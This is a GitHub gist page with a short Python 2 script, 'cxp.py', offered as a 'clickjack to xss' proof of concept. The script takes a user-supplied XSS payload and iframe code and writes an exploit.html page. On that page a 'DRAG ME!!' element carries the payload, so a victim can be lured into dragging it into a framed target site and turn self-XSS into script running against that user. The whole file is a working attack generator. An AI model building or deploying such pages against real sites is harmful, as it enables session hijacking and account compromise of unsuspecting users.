Create a gist now

Instantly share code, notes, and snippets.

@vishwaraj /cxp.py
Last active Jul 26, 2017

What would you like to do?
clickjack to xss poc
print "Clickjack to Xss"
vector=raw_input('xss vector--> ') #xss payload
html=raw_input('Custom Iframe Code--> ') #custom iframe code
fo=open('exploit.html','w') #creating html file
source_code="""<html><body>
<h1>Clickjack to exploit self xss </h1>
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
"""%(vector)
fo.write(source_code)
fo=open('exploit.html','a')
fo.write(html)
fo.write('</body></html>')
fo.close() #closing the file
print "file created"
Owner

vishwaraj commented Apr 12, 2016

You can see working Poc here Blog link

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment